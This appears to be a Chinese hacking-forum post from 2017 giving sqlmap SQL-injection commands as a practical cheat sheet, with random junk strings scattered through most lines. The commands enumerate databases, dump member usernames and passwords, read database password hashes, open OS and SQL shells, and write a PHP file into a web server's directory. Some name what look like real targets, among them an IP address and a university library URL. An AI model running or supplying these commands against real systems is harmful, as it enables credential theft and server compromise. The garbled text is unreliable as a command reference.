找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1701|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
/pentest/database/sqlmap) _6 o) ?6 a6 e3 y3 l7 O$ v* S

5 m; L! X$ m, J$ ]3 F8 i, H( s/ rupdate :::::>     in the folder   after  execute    following   order : svn update
9 d  ]3 ^# x) _3 U( }' o7 J" q' R9 @5 n" k8 f9 h
sqlmap.py -r 1.txt --current-db
+ \7 K: t$ u1 |6 |% i
* ^* h6 x% D9 E' V6 a8 `9 }3 c: Dv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”. E$ D" X" E3 [2 ~

3 ^+ L$ `% _1 z0 B' G==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) : Y) T2 r8 Z/ @4 \) s0 F
猜解数据库5 d7 G, v6 A9 J  t' z( V
./sqlmap.py -u "injection-url" --dbs* O# K2 C( a1 M$ M$ J
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"$ x; r7 N) D5 I# b" s
* T1 e& D+ k8 s5 E
猜解表名3 _+ c% c2 O+ M
./sqlmap.py -u "injection-url" -D database_name --tables3 s: ^& Q2 |* @( m0 Q

. p) n/ O$ U/ m- w5 G* |# Z6 Zsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
1 ^/ p4 x& v6 I( [- G% Psqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
; u; h% k: y: n" t8 g' W5 T+ s& }4 z( Q- E' ?9 {/ F1 e
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
5 s- m+ j% L  U4 b- Q. Y
; O7 m1 @: F2 C- Jsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"+ I4 ~9 I% V$ N9 o
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
5 B& f* m0 W1 h/ T* c+ Ysqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 9 O7 `# E: Q. A! @; G1 |, [: {
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"5 F9 x& t9 E8 |

" Z. ?# i6 B3 b/ s5 isqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"7 h2 B8 N4 L$ Z! U* J0 ]. u
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
. z7 U$ ?5 ^( f5 dsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"9 F5 r" f) ~" Z! V
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
! C- j$ T) R& I3 O4 u2 jsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
# w9 q, w' F- i' g4 `. b9 Z
. K: I; c% `2 t( l! j$ J+ q0 t! Wsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了/ G. C% Y3 \4 W
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"! i  H  ?( U5 w7 z; U# U
3 R9 t& d4 [* Z9 K' n
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"" U$ S3 [! |$ U. y2 }
猜解列名
( e& F6 s% W9 M( m! z5 e$ h; c5 p./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
7 Q1 e; @! x8 G9 R& Z2 ~& ]
) B$ n2 e2 z, [; O3 l/ b% {sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
1 |  y* A& [& ]1 j* ?) ]sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" 7 _+ J! a' r0 G) z- G
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"9 b  V( G/ `$ H3 [- d) o
2 }  Q. r. I5 Z. v# J" A' O
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
- \) Q' V* u2 z: L: T7 c6 r: j/ d8 z&submit=Go
4 o  e* W% {5 r. w# x) A猜解值+ W" z4 R" K$ T3 H0 r' n
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
& ?$ c* D7 i6 ]8 d; P========================================================
# b: _; |! X( F1 g搜索表名中包括mana字符的- e$ Z, |8 J3 N5 F4 Q/ f6 L
/sqlmap.py -u "injection-url" -T mana --search8 S; @/ a& W' f' F5 ^3 q2 t
返回一个交互式sql shell
& k: J$ ~; f, r/ n8 K$ J/sqlmap.py -u "injection-url" --sql-shell! J! m) u" r$ K! _% @+ p' g
读取指定文件(需权限); r  a: f& M+ Q% d9 p. H
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"- O  O2 M0 E/ a
查看当前 用户 及 数据库 , q3 \% Y+ D. r' G) J) e
/sqlmap.py -u "injection-url" --current-user --current-db
" x1 n9 y" N' E* Y本地文件 写入 远程目标绝对路径' d; p7 h. ]" ]- t
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
" x& c5 l: D9 M( v8 [- d7 Tsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
! o" R" R2 B: P2 i( ?2 ?0 `+ k
$ R2 F" i/ R, _5 `( msqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
% G( Z/ n8 {( X' ]查看某用的权限
. e8 R3 i0 I  r/sqlmap.py -u "injection-url" --privileges -U root  X1 E' i$ O2 @, e4 Y% y, C
查看当前用户是否为dba5 r* e  D4 q  J' n- d
/sqlmap.py -u "injection-url" --is-dba
' B0 L# _# N+ s. ?$ |; t1 P: ^读取所有数据库用户或指定数据库用户的密码9 z7 f' D6 I- j* X' q" Z% J% {) w
sqlmap.py -r 1.txt --users --passwords, L; l0 l9 h, h0 m2 E1 }* q
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
: m# ^- a9 x* O2 ]% E, H8 F
* {! }! }# k. j4 L5 W: Y/sqlmap.py -u "injection-url" --passwords -U root* C) y" p/ F9 U6 Q  @9 T! Y$ p2 k
/ I  S( T9 s, A& o" S) K4 y0 ]
--start&&--stop 与 --first&&--last 的区别# ]& h# ]- m2 w) M. F: y
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
- D; X; e# ~/ d$ G% F4 E
  B0 I  D* g( O' p: R* n# Y- y从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
  N/ v! V; A- v1 j9 k5 j/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables7 ]8 G0 ~3 g6 J, d# L
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns$ w1 K5 {0 ?: L- j

, Y2 Q+ a! U( M( K( M执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
% H8 k- w' Q& }  Z6 ~4 ?) j$ C/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"7 j& `  V; d. w

1 R7 G0 j8 B4 E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表